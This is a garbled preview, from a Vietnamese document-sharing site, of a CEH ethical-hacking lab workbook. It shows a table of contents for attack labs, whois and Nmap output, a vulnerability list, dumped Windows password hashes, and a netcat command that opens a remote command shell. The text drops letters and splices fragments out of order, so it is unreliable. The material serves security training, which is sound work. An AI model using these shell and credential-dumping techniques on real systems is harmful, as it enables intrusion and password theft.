Tài liệu Giáo trình bài tập CEH - Phần 1 doc

37 602 5
Tài liệu Giáo trình bài tập CEH - Phần 1 doc

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 1 Mc Lc Bài 1: . 3 FOOTPRINTING 3 I/ Gii thiu v Foot Print: . 3 II/ Các bài thc hành: 3 Bài 1: Tìm thông tin v Domain . 3 Bài 2: Tìm thông tin email . 5 Bài 2: . 7 SCANNING 7 I/ Gii thiu v Scanning: . 7 II/ Các Bài thc hành . 7 Bài thc hành 1: S dng Phn mm Nmap 7 Bài thc hành th 2: S dng phn mm Retina đ phát hin các vulnerabilities và tn công bng Metaesploit framework 13 Bài 3: . 18 SYSTEM HACKING . 18 I/ Gii thiu System Hacking: . 18 II/ Thc hành các bài Lab . 18 Bài 1: Crack password nt b ni b 18 Bài 2: S dng chng trình pwdump3v2 khi có đc 1 user administrator ca máy nn nhân đ có th tìm đc thông tin các user còn li. . 20 Bài Lab 3: Nâng quyn thông qua chng trình Kaspersky Lab 23 Bài Lab 4: S dng Keylogger . 25 Bài Lab 5: S dng Rootkit và xóa Log file 27 Bài 4: . 30 TROJAN và BACKDOOR 30 I/ Gii thiu v Trojan và Backdoor: . 30 II/ Các bài thc hành: 30 Bài 1 S dng netcat: . 30 Bài 2: S dng Trojan Beast và detect trojan . 32 Mun s dng Trojan Beast, ta cn phi xây dng 1 file Server cài lên máy nn nhân, sau đó file server này s lng nghe  nhng port c đnh và t máy tn công ta s connect vào máy nn nhân thông qua cng này. 32 Bài 3: S dng Trojan di dng Webbase 35 Bài 5: . 38 CÁC PHNG PHÁP SNIFFER . 38 I/ Gii thiu v Sniffer 38 Bài 6: . 65 Tn Công t chi dch v DoS . 65 I/ Gii thiu: 65 II/ Mô t bài lab: 67 Bài Lab 1: DoS bng cách s dng Ping of death. . 67 Bài lab 2: DoS 1 giao thc không s dng chng thc(trong bài s dng giao thc RIP) . 69 Bài Lab 3: S dng flash đ DDoS 72 Bài 7: . 74 Social Engineering . 74 I/ Gii Thiu 74 Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 2 II/ Các bài Lab: 74 Bài Lab 1: Gi email nc đính kèm Trojan 74 Bài 8: . 77 Session Hijacking . 77 I/ Gii thiu: . 77 II/ Thc hin bài Lab 77 Bài 9: . 80 Hacking Web Server 80 I/ Gii thiu: . 80 II/ Thc Hin bài lab 80 Bài Lab 1: Tn công Web Server Win 2003(li Apache) 80 Bài lab 2: Khai thác li ng dng Server U . 84 Bài 10: . 85 WEB APPLICATION HACKING 85 I/ Gii thiu: 85 II/ Các Bài Lab . 85 Bài Lab 1: Cross Site Scripting 85 Bài Lab 2: Insufficient Data Validation 86 Bài Lab 3: Cookie Manipulation . 88 Bài Lab 4: Authorization Failure 89 Bài 11: . 91 SQL INJECTION 91 I/ Gii thiu v SQL Injection: 91 II/ Thc Hành Bài Lab 94 Bài 12: . 101 WIRELESS HACKING 101 I/ Gii Thiu . 101 II/ Thc hành bài Lab: 101 Bài 13: . 105 VIRUS 105 I/ Gii thiu: (tham kho bài đc thêm) . 105 II/ Thc hành Lab: 105 Bài 1: Virus phá hy d liu máy 105 Bài 2: Virus gaixinh lây qua tin nhn 107 Bài 14: . 111 BUFFER OVERFLOW . 111 I/ Lý thuyt 111 II/ Thc hành: 118 Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 3 Bài 1: FOOTPRINTING I/ Gii thiu v Foot Print: ây là k thut giúp hacker tìm kim thông tin v 1 doanh nghip, cá nhân hay t chc. Bn có th điu tra đc rt nhiu thông tin ca mc tiêu nh vào k thut này. Ví d trong phn thc hành th 1 chúng ta áp dng k thut này tìm kim thông tin v mt domain(ví d là www.itvietnam.com ) và xem th email liên lc ca domain này là ca ai, trong phn thc hành th 2 chúng ta truy tìm 1 danh sách các email ca 1 keywork cho trc, phng pháp này hiu qu cho các doanh nghip mun s dng marketing thông qua hình thc email v.v. Trong giai don này Hacker c gng tìm càng nhiu thông tin v doanh nghip(thông qua các kênh internet và phone) và cá nhân(thông qua email và hot đng ca cá nhân đó trên Internet), nu thc hin tt bc này Hacker có th xác đnh đc nên tn công vào đim yu nào ca chúng ta. Ví d mun tn công domain www.itvietnam.com thì Hacker phi bit đc đa ch email nào là ch cùa domain này và tìm cách ly password ca email thông qua tn công mail Server hay sniffer trong mng ni b v.v. Và cui cùng ly đc Domain này thông qua email ch này. II/ Các bài thc hành: Bài 1: Tìm thông tin v Domain Ta vào trang www.whois.net đ tìm kim thông tin và đánh vào domain mình mun tìm kim thông tin Sau đó ta nhn đc thông tin nh sau: Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 4 Registrar Name : BlueHost.Com Registrar Whois .: whois.bluehost.com Registrar Homepage: http://www.bluehost.com/ Domain Name: ITVIETNAM.COM Created on : 1999-11-23 11:31:30 GMT Expires on : 2009-11-23 00:00:00 GMT Last modified on : 2007-07-30 03:15:11 GMT Registrant Info: (FAST-12836461) VSIC Education Corporation VSIC Education Corporation 78-80 Nguyen Trai Street, 5 District, HCM City, 70000 Vietnam Phone: +84.88363691 Fax : Email: jkow@itvietnam.com Last modified: 2007-03-23 04:12:24 GMT Administrative Info: (FAST-12836461) VSIC Education Corporation VSIC Education Corporation 78-80 Nguyen Trai Street, 5 District, HCM City, 70000 Vietnam Phone: +84.88363691 Fax : Email: jkow@itvietnam.com Last modified: 2007-03-23 04:12:24 GMT Technical Info: (FAST-12785240) Attn: itvietnam.com C/O BlueHost.Com Domain Privacy 1215 North Research Way Suite #Q 3500 Orem, Utah 84097 United States Phone: +1.8017659400 Fax : +1.8017651992 Email: whois@bluehost.com Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 5 Last modified: 2007-04-05 16:50:56 GMT Status: Locked Ngoài vic tìm thông tin v domain nh trên, chúng ta có th s dng các tin ích Reverse IP domain lookup đ có th xem th trên IP ca mình có bao nhiêu host chung vi mình. Vào link sau đây đ s dng tin ích này. http://www.domaintools.com/reverse-ip/ Vic tìm kim đc thông tin này rt cn thit vi Hacker, bi vì da vào thông tin s dng chung Server này, Hacker có th thông qua các Website b li trong danh sách trên và tn công vào Server t đó kim soát tt c các Website đc hosting trên Server. Bài 2: Tìm thông tin email Trong bài thc hành này, chúng ta s dng phn mm “1 st email address spider” đ tìm kim thông tin v các email. Hacker có th s dng phn mm này đ thu thp thêm thông tin v mail, hay lc ra các đi tng email khác nhau, tuy nhiên bn có th s dng tool này đ thu thp thêm thông tin nhm mc đích marketing, ví d bn cn tìm thông tin ca các email có đuôi là @vnn.vn hay @hcm.vnn.vn đ phc cho vic marketing sn phm. Ta có th cu hình vic s dng trang web nào đ ly thông tin, trong bài tôi s dng trang google.com đ tìm kim. Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 6 Sau đó đánh t khóa vnn.vn vào tag keyword Sau đó chúng ta đã có đc 1 list mail nh s dng trng trình này. Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 7 Bài 2: SCANNING I/ Gii thiu v Scanning: Scanning hay còn gi là quét mng là bc không th thiu đc trong quá trình tn công vào h thng mng ca hacker. Nu làm bc này tt Hacker s mau chóng phát hin đc li ca h thng ví d nh li RPC ca Window hay li trên phm mm dch v web nh Apache v.v. Và t nhng li này, hacker có th s dng nhng đon mã đc hi(t các trang web) đ tn công vào h  thng, ti t nht ly shell. Phn mm scanning có rt nhiu loi, gm các phm mm thng mi nh Retina, GFI, và các phn mm min phí nh Nmap,Nessus. Thông thng các n bn thng mi có th update các bug li mi t internet và có th dò tìm đc nhng li mi hn. Các phn mm scanning có th giúp ngi qun tr tìm đc li ca h thng, đng th i đa ra các gii pháp đ sa li nh update Service patch hay s dng các policy hp lý hn. II/ Các Bài thc hành Bài thc hành 1: S dng Phn mm Nmap Trc khi thc hành bài này, hc viên nên tham kho li giáo trình lý thuyt v các option ca nmap. Chúng ta có th s dng phn mm trong CD CEH v5, hay có th download bn mi nht t website: www.insecure.org . Phn mm nmap có 2 phiên bn dành cho Win và dành cho Linux, trong bài thc hành v Nmap, chúng ta s dng bn dành cho Window.  thc hành bài này, hc viên nên s dng Vmware và boot t nhiu h điu hành khác nhau nh Win XP sp2, Win 2003 sp1, Linux Fedora Core, Win 2000 sp4,v.v. Trc tiên s dng Nmap đ do thám th xem trong subnet có host nào up và các port các host này m, ta s dng lnh Nmap –h đ xem li các option ca Nmap, sau đó thc hin lnh “Nmap –sS 10.100.100.1-20”. Và sau đó đc kt qu sau: C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20 Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard Time Interesting ports on 10.100.100.1: Not shown: 1695 closed ports PORT STATE SERVICE 22/tcp open ssh 111/tcp open rpcbind MAC Address: 00:0C:29:09:ED:10 (VMware) Interesting ports on 10.100.100.6: Not shown: 1678 closed ports PORT STATE SERVICE Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 8 7/tcp open echo 9/tcp open discard 13/tcp open daytime 17/tcp open qotd 19/tcp open chargen 23/tcp open telnet 42/tcp open nameserver 53/tcp open domain 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1027/tcp open IIS 1030/tcp open iad1 2105/tcp open eklogin 3389/tcp open ms-term-serv 8080/tcp open http-proxy MAC Address: 00:0C:29:59:97:A2 (VMware) Interesting ports on 10.100.100.7: Not shown: 1693 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS MAC Address: 00:0C:29:95:A9:03 (VMware) Interesting ports on 10.100.100.11: Not shown: 1695 filtered ports PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:A6:2E:31 (VMware) Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support scanning your own machine (localhost) this way. All 0 scanned ports on 10.100.100.13 are Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 9 Interesting ports on 10.100.100.16: Not shown: 1689 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1433/tcp open ms-sql-s MAC Address: 00:0C:29:D6:73:6D (VMware) Interesting ports on 10.100.100.20: Not shown: 1693 closed ports PORT STATE SERVICE 135/tcp open msrpc 445/tcp open microsoft-ds 1000/tcp open cadlock 5101/tcp open admdog MAC Address: 00:15:C5:65:E3:85 (Dell) Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds Trong mng có tt c 7 host, 6 máy Vmware và 1 PC DELL. Bây gi bc tip theo ta tìm kim thông tin v OS ca các Host trên bng s dng lnh “ Nmap –v -O ip address” . C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7 (xem chi tit Nmap quét) Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:46 Pacific Standard Time Initiating ARP Ping Scan at 10:46 Scanning 10.100.100.7 [1 port] Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 10:46 Completed Parallel DNS resolution of 1 host. at 10:46, 0.01s elapsed Initiating SYN Stealth Scan at 10:46 Scanning 10.100.100.7 [1697 ports] Discovered open port 1025/tcp on 10.100.100.7 Discovered open port 445/tcp on 10.100.100.7 Discovered open port 135/tcp on 10.100.100.7 Discovered open port 139/tcp on 10.100.100.7 Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 10 Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports) Initiating OS detection (try #1) against 10.100.100.7 Host 10.100.100.7 appears to be up . good. Interesting ports on 10.100.100.7: Not shown: 1693 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS MAC Address: 00:0C:29:95:A9:03 (VMware) Device type: general purpose Running: Microsoft Windows 2003 OS details: Microsoft Windows 2003 Server SP1 OS Fingerprint: OS:SCAN(V=4.20%D=8/2%OT=135%CT=1%CU=36092%PV=Y%DS=1%G=Y%M=000C 29%TM=46B2187 OS:3%P=i686-pc-windows- windows)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=0) OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS%O3=M5B4NW0NNT0 0%O4=M5B4NW0NNT0 OS:0NNS%O5=M5B4NW0NNT00NNS%O6=M5B4NNT00NNS)WIN(W1=FAF0%W2=F AF0%W3=FAF0%W4=F OS:AF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%T=80%W=FAF0%O=M5B4NW0NN S%CC=N%Q=)T1(R=Y OS:%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S= Z%A=S%F=AR%O=%RD OS:=0%Q=)T3(R=Y%DF=N%T=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4NW0NNT 00NNS%RD=0%Q=)T4 OS:(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T =80%W=0%S=Z%A=S+% OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD= 0%Q=)T7(R=Y%DF=N% OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%TOS=0 %IPL=B0%UN=0%RIP OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=S%T=80%T OSI=Z%CD=Z%SI=S% OS:DLI=S) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=255 (Good luck!) IPID Sequence Generation: Incremental [...]... WINS - Host Name Server 1 8 TCP:53 DOMAIN - Domain Name Server 1 9 TCP:80 WWW-HTTP - World Wide Web HTTP (Hyper Text Transfer Protocol) 1 10 TCP :13 5 RPC-LOCATOR - RPC (Remote Procedure Call) Location 1 Service 11 TCP :13 9 NETBIOS-SSN - NETBIOS Session Service 1 12 TCP:445 MICROSOFT-DS - Microsoft-DS 1 13 TCP :10 25 LISTEN - listen 1 14 TCP :10 26 NTERM - nterm 1 15 TCP :10 30 IAD1 - BBN IAD 1 16 TCP: 210 3 ZEPHYR-CLT... Netcat (1) C:\>nc -nvv -l -p 80 listennng on [any] 80 connect to [17 2 .16 .84 .1] from [17 2 .16 .84.2] 10 55 pwd ls -la _ + c a s Netcat (2) C:\>nc -nvv -l -p 25 listening on [any] 25 connect to [17 2 .16 .84 .1] from (UNKNOWN) [17 2 .16 .84.2] 10 56 / total 17 1 drwxr-xr-x 17 root root 4096 Feb 5 16 :15 drwxr-xr-x 17 root root 4096 Feb 5 16 :15 drwxr-xr-x 2 root root 4096 Feb 5 08:55 b (²?n drwxr-xr-x 3... Feb 5 14 :19 boot drwxr-xr-x 13 root root 10 6496 Feb 5 14 :18 dev drwxr-xr-x 37 root root 4096 Feb 5 14 :23 et = ²? drwxr-xr-x 6 root root 4096 Feb 5 08:58 home drwxr-xr-x 6 root root 4096 Feb 5 08:50 l (²?b drwxr-xr-x 2 root root 716 8 De = ²? 31 1969 mnt drwxr-xr-x 4 root root 4096 Feb 5 16 :18 n = ²? drwxr-xr-x 2 root root 4096 Aug 23 12 :03 opt dr-xr-xr-x 61 root root 0 Feb 5 09 :18 pro = ²? drwx 12 root... hacker :10 18:BCE739534EA4E445AAD3B435B 514 04EE:5E7599F673DF11D5C5C4D950F 5BF 015 7::: hao123 :10 20:58F907D1C79C344DAAD3B435B 514 04EE:FD03071D 413 08B58B9DDBC6D 5576D78D::: VSIC Education Corporation Trang 21 Giáo trình bài t p C|EH Tài li u dành cho h c viên haoceh :10 16:B3FF8763A6B5CE26AAD3B435B 514 04EE:7AD94985F28454259BF2A038 21 FEC8DB::: hicehclass :10 23:B2BEF1B1582C2DC0AAD3B435B 514 04EE:D 619 8C25F8420A93301A579 2398CF94C::: IUSR _11 3SSR3JKXGW3N :10 03:449 913 C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F483... IUSR _11 3SSR3JKXGW3N :10 03:449 913 C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F483 3ABFA52ADA9462::: IWAM _11 3SSR3JKXGW3N :10 04:44 310 05ABF401D86F92DBAC26FDFD3B8 :18 8AA6E0737F12D16 D60F8B64F7AE1FA::: lylam :10 12:EE94DC327C009996AAD3B435B 514 04EE:7A63FB0793A85C960A775497C9 D738EE::: quyen:500:A00B 919 4BEDB81FEAAD3B435B 514 04EE:5C800F13A3CE86ED2540DD4E 7331E9A2::: SUPPORT_388945a0 :10 01: NO PASSWORD*********************:F791B19C488F4260723561D4F484EA09::: tam :10 14:NO PASSWORD*********************:NO... finished: 1 IP address (1 host up) scanned in 12 .485 seconds Tuy nhiên ta có th nh n di n r ng ây là 1 Server ch y d ch v SQL và Web Server, bây gi ta s d ng l nh “ Nmap –v –p 80 sV 10 .10 0 .10 0 .16 ” xác nh version c a IIS C:\Documents and Settings\anhhao>nmap -p 80 -sV 10 .10 0 .10 0 .16 Starting Nmap 4.20 (http://insecure.org ) at 200 7-0 8-0 2 11 : 01 Pacific Standard Time Interesting ports on 10 .10 0 .10 0 .16 : PORT... BBD9D5E18::: anhhaoceh :10 19:B26C623F5254C6A 311 F64391B17C6CDE:98A2C048C77703D54BD0E88 887EFD68E::: ASPNET :10 06:7CACBCC121AC203CD8652FE65BEA4486:7D34A6E7504DFAF453D4 21 3660AE7D35::: Guest:5 01: NO PASSWORD*********************:NO PASSWORD*********************::: hack :10 22:CCF 915 5E3E7DB453AAD3B435B 514 04EE:3DBDE697D 716 90A769204BEB12 283678::: hacker :10 18:BCE739534EA4E445AAD3B435B 514 04EE:5E7599F673DF11D5C5C4D950F... Registry Access Available 1 6 telnet service 1 7 DCOM Enabled 1 8 Windows RPC Cumulative Patch 8287 41 Remote 1 9 Windows RPC DCOM interface buffer overflow 1 10 Windows RPC DCOM multiple vulnerabilities 1 11 Apache 1. 3.27 0x1A Character Logging DoS 1 VSIC Education Corporation Trang 14 Giáo trình bài t p C|EH Tài li u dành cho h c viên 12 Apache 1. 3.27 HTDigest Command Execution 1 13 Apache mod_alias and... Buffer Overflow 1 14 ApacheBench multiple buffer overflows 1 15 HTTP TRACE method supported 1 TOP 20 OPEN PORTS The following is an overview of the top 20 open ports on your network Rank Port Number Description Count 1 TCP:7 ECHO - Echo 1 2 TCP:9 DISCARD - Discard 1 3 TCP :13 DAYTIME - Daytime 1 4 TCP :17 QOTD - Quote of the Day 1 5 TCP :19 CHARGEN - Character Generator 1 6 TCP:23 TELNET - Telnet 1 7 TCP:42... Unix) E:\>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 connect to [17 2 .16 .84 .1] from (UNKNOWN) [17 2 .16 .84 .1] 315 9 sent 0, rcvd 0: unknown socket error - trên máy tính dùng t n công, b n ch vi c dùng netcat n i nhân trên c ng ã nh, ch ng h n nh 8080 n máy n n C:\>nc -nvv 17 2 .16 .84.2 8080 (UNKNOWN) [17 2 .16 .84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00. 219 5] © Copyright 19 8 5 -1 999 Microsoft . on : 19 9 9 -1 1- 2 3 11 : 31: 30 GMT Expires on : 200 9 -1 1- 2 3 00:00:00 GMT Last modified on : 200 7-0 7-3 0 03 :15 :11 GMT Registrant Info: (FAST -1 2 8364 61) . TCP :13 9 NETBIOS-SSN - NETBIOS Session Service 1 12. TCP:445 MICROSOFT-DS - Microsoft-DS 1 13. TCP :10 25 LISTEN - listen 1 14. TCP :10 26 NTERM - nterm 1 15.

Ngày đăng: 23/12/2013, 03:17

Từ khóa liên quan

Tài liệu cùng người dùng

Tài liệu liên quan